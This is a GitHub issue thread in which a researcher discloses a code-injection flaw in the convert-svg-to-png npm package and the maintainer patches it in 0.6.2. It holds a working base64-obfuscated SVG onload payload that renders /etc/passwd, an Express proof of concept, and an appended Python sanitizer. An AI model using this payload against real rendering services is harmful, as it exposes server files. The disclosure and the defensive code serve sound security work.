
Remote Code Injection vulnerable #81

Closed
0xmanhnv opened this issue May 26, 2022 · 11 comments · Fixed by #82

@0xmanhnv

Affected versions of this package are vulnerable to Remote Code Injection. Using a specially crafted SVG file, an attacker could read arbitrary files from the file system and then show the file content as a converted PNG file.

poc

@0xmanhnv
Author

@neocotic

@neocotic
Owner

This has been fixed in the latest major release but the CVE hasn't been updated yet.

@0xmanhnv
Author

0xmanhnv commented May 28, 2022

@neocotic no, this is a new vulnerability.

I tried with the new version, but this security vulnerability still exists.

@0xmanhnv
Author

0xmanhnv commented May 28, 2022

Payload

<svg onload=eval(atob(this.id)) id='ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs='></svg>

POC

const { convert } = require('convert-svg-to-png');
const express = require('express');
const fileSvg = `<svg onload=eval(atob(this.id)) id='ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs='></svg>`;
// YWxlcnQoMSk=
// function newContent(){document.open(),document.write('<text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text>'),document.close()}
const app = express();
app.get('/poc', async (req, res)=>{
  try {
    const png = await convert(fileSvg);
    res.set('Content-Type', 'image/png');
    res.send(png);
  } catch (e) {
    console.log(e);
    res.send("");
  }
});
app.listen(3000, ()=>{
  console.log('started');
});

@0xmanhnv
Author

0xmanhnv commented May 28, 2022

I checked on the latest version

[screenshot: 2022-05-28 15:15:25]

Latest version on NPM

[screenshot: 2022-05-28 15:17:16]

@neocotic
Owner

Great find. Since we're now using cheerio to validate input, we should be able to easily strip the onload attribute. Are there any others that you think could be used to exploit in this way or any other nested elements within the SVG, other than the root that this needs to be applied to?

@0xmanhnv
Author

0xmanhnv commented May 28, 2022

I will try to add some other ways that I think work, then I'll let you know.

But this is clearly a CVE, right?
@neocotic

@neocotic
Owner

It looks like it to me. I'll try to get a patch together over this weekend for it. If you find any other ways, let me know and I'll add them, but I'll concentrate on the known attack vector for now.

@0xmanhnv
Author

@neocotic yes.
But can I claim a CVE?

@neocotic
Owner

No idea. Might be good to have a patch available beforehand.

neocotic added a commit that referenced this issue May 29, 2022
In order to prevent a remote code injection, the `onload` attribute needs to be removed from the SVG input as Puppeteer/Chromium will execute any code within it which could potentially be malicious.

Fixes #81
@neocotic neocotic added this to the 0.6.2 milestone May 29, 2022
@neocotic neocotic added the bug label May 29, 2022
@neocotic
Owner

@0xmanhnv A fix has now been released in 0.6.2. If you find any other attack vectors (e.g. other event listener attributes) then please raise another issue/PR and we can get it patched.

Please feel free to open a CVE for this vulnerability now with an upgrade path to 0.6.2 mentioned as a solution.
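As an added example (not code from this thread or from convert-svg-to-png, which the maintainer says validates input with cheerio), here is the sanitization step the thread describes, written in Python with the standard-library XML parser: it strips every on* event-handler attribute from every element rather than only the root, drops <script> elements, and rejects input that is not well-formed XML instead of passing it through. The sample SVG is constructed for the example, and the defusedxml suggestion is a hardening note, not something from the thread.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)  # keep xmlns="..." as the default namespace on output

def _local(name):
    """Strip a Clark-notation namespace: '{uri}local' -> 'local'."""
    return name.rsplit("}", 1)[-1]

def sanitize_svg(svg_text):
    """Return (cleaned_svg, report): every on* event-handler attribute is removed from
    every element (root and nested alike) and every <script> element is dropped.
    Input that is not well-formed XML raises ValueError; Chromium's lenient HTML
    parser would still render it, so the caller must fail closed rather than skip it.
    (Parse untrusted XML with defusedxml in production; stdlib ET is used here.)"""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        raise ValueError(f"refusing SVG that is not well-formed XML: {exc}") from None
    report = {"attrs": [], "elements": []}
    # Collect first, then remove: mutating the tree while iter() walks it skips nodes.
    doomed = [(p, c) for p in root.iter() for c in p if _local(c.tag).lower() == "script"]
    for parent, child in doomed:
        parent.remove(child)
        report["elements"].append("script")
    for el in root.iter():
        for attr in list(el.attrib):
            if _local(attr).lower().startswith("on"):  # onload, onclick, onbegin, ...
                del el.attrib[attr]
                report["attrs"].append(f"{_local(el.tag)}@{_local(attr)}")
    return ET.tostring(root, encoding="unicode"), report

def accepts(svg_text):
    """True when the input parses and can be sanitized, False when it is rejected."""
    try:
        sanitize_svg(svg_text)
        return True
    except ValueError:
        return False

# Constructed sample (not the report's payload): handlers on the root and on a nested
# element plus an inline script, all of which a root-only onload check would miss.
SAMPLE = (
    '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10" onload="alert(1)">'
    '<rect width="5" height="5" onclick="alert(2)"/>'
    '<script>alert(3)</script><text x="0" y="0">data</text></svg>'
)
```

Because a browser parses SVG leniently, a checker that silently skips unparseable input would let the thread's unquoted-attribute form through; rejecting it is the safe default.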
